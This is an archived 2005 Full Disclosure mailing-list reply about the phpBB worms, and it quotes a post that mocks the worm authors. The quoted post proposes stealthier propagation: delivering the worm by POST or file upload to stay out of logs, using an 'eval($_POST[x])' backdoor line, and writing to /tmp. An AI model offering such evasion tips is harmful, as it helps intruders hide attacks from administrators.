Full Disclosure mailing list archives
Re: phpBB Worm writers are dumb
From: Stian Øvrevåge <sovrevage () gmail com>
Date: Tue, 4 Jan 2005 08:47:32 +0100
On Mon, 3 Jan 2005 17:40:28 +0100, EmirAga <emiraga () emiraga com> wrote:
lots has passed since releasing a phpbb worm by some stupid people, i will list my oppinion about it. - why release a worm? not sure about newer ones, but first one did not do anything, so, whats the point?. Worm will warn whole world about vulnerability and most of servers will patch it, without worm it would stay just another bug in their forum and most non will worry about it. Security _penetators_ are loosing their jobs because of you.
So, releasing a worm that does nothing but warn the world and getting the holes patched? I would agree this is stupid from a black-hat's point of view, but I think it's better that some kiddies exploit and expose the vuln/exploit than some organized criminals. Have you ever done something for the kick off it? The message I'm replying to now, is there a point? Except saying they are stupid?
- first worm sent a thousand requests before infection. The newer one do 'wget' it from static http location. STUPID. Simply worm could send his self by POST or FILE_UPLOAD method since they are not written in logs. In logs would be written a small request that most administrators will not notice. what's wrong with eval($_POST[x])?
It is possible for the authors to replace the scripts and hence, load different payloads as time goes, it hasn't been done, but it is a possibility. I would say this is harder with self-carrying code.
- first worm wrote his self to current directory, we all know that in most cases this will fail. Better solution would be to write to /tmp, or even better to use upload $_FILES[worm][tmp_name]. So stupid! - Why didn't they removed comments and replaced their variables with smaller ones, so worm will go faster.
Agree with this one, it's not very "nice" code to look at, especially when it's in some strange foreign language.
i just hope no one will rewrite its code with newer _version_ cuz then i will be the stupid one here. just wanted to say that worm writing sucks and real programmer will never release one. greets
I myself are fascinated by worms, but then again I'm not a real programmer. My two cents - Stian _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- phpBB Worm writers are dumb EmirAga (Jan 03)
- Re: phpBB Worm writers are dumb Stian Øvrevåge (Jan 04)
- RE: phpBB Worm writers are dumb Patrick Nolan (Jan 06)